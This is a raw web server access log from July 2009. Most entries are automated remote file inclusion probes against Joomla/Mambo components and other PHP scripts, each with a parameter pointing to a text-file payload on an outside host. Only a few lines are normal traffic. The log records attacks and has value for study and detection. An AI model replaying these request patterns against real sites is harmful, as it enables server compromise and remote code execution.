204.9.247.53 - - [06/Jul/2009:03:23:19 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:20 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:20 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:55 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:55 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:55 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
125.245.146.253 - - [06/Jul/2009:03:24:23 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:24:39 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:24:39 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:24:39 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:24:39 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:24:39 -0400] "GET //include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:24:39 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:24:45 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:24:47 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:24:54 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:24:56 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:24:56 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.230.9.68 - - [06/Jul/2009:03:25:23 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:25:23 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:25:23 -0400] "GET /logs/access_log.Q109051700/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [06/Jul/2009:03:27:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [06/Jul/2009:03:27:58 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:27:58 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:27:58 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:28:01 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:28:01 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:28:01 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:28:15 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:28:15 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:29:04 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.136.16 - - [06/Jul/2009:03:29:05 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yeojuspa.co.kr/board/readme.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.236.242.164 - - [06/Jul/2009:03:30:14 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:03:30:14 -0400] "GET /logs/access_log.Q109051700/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:03:30:14 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
58.227.193.198 - - [06/Jul/2009:03:31:44 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:31:47 -0400] "GET /e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:31:47 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:32:10 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:32:11 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
58.227.193.198 - - [06/Jul/2009:03:32:13 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:03:32:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [06/Jul/2009:03:33:11 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:03:33:12 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:03:33:13 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
58.227.193.198 - - [06/Jul/2009:03:33:18 -0400] "GET /logs/access_log.Q109060600%20%20/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:33:27 -0400] "GET /logs/access_log.Q109060300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:33:31 -0400] "GET /logs/access_log.Q109060300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:33:42 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
74.53.70.114 - - [06/Jul/2009:03:34:03 -0400] "GET //main.php?sayfa=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:03 -0400] "GET /logs//main.php?sayfa=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:03 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:03 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:04 -0400] "GET //main.php?sayfa=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:04 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:04 -0400] "GET /logs//main.php?sayfa=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:34:04 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:34:32 -0400] "GET /logs/error_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:34:35 -0400] "GET /logs/error_log.Q109041400%20%20/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:35:19 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:35:19 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:35:41 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:03:35:41 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:35:49 -0400] "GET /nav.php?pagina=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:35:49 -0400] "GET /logs/nav.php?pagina=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:35:49 -0400] "GET /logs/access_log.Q109060500/nav.php?pagina=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:35:49 -0400] "GET /logs/error_log.Q109060500/nav.php?pagina=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:03:36:15 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:03:36:18 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:03:36:18 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:36:29 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:36:30 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:36:49 -0400] "GET /logs/access_log.Q109060500%20%20/nav.php?pagina=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:03:36:50 -0400] "GET /logs/error_log.Q109060500%20%20/nav.php?pagina=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:37:06 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:37:14 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:37:41 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:37:43 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:03:37:51 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:03:37:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.82.228.83 - - [06/Jul/2009:03:38:06 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:06 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:06 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:15 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:15 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:17 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:17 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:18 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:18 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:18 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:18 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:21 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:23 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:23 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:23 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:38:40 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:38:40 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:38:41 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:44 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:44 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:03:38:45 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:03:38:46 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:03:39:01 -0400] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.230.9.68 - - [06/Jul/2009:03:39:02 -0400] "GET /logs/access_log.Q109051800/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.249.68.70 - - [06/Jul/2009:03:39:52 -0400] "GET /images/items/3105205_thumb.jpg HTTP/1.1" 200 2549 "-" "Googlebot-Image/1.0"
211.230.156.161 - - [06/Jul/2009:03:39:54 -0400] "GET /index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:54 -0400] "GET /logs/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:54 -0400] "GET /logs/access_log.Q109061300%20%20/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:54 -0400] "GET /index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:54 -0400] "GET /logs/access_log.Q109061300%20%20/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:54 -0400] "GET /logs/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:55 -0400] "GET /index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:55 -0400] "GET /logs/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:55 -0400] "GET /logs/access_log.Q109061300%20%20/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:55 -0400] "GET /logs/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:55 -0400] "GET /index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:39:55 -0400] "GET /logs/access_log.Q109061300%20%20/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.73.53.237 - - [06/Jul/2009:03:40:52 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
85.73.53.237 - - [06/Jul/2009:03:40:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
85.73.53.237 - - [06/Jul/2009:03:40:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
85.73.53.237 - - [06/Jul/2009:03:40:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; el; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
124.217.216.86 - - [06/Jul/2009:03:40:56 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.217.216.86 - - [06/Jul/2009:03:40:56 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.217.216.86 - - [06/Jul/2009:03:40:56 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
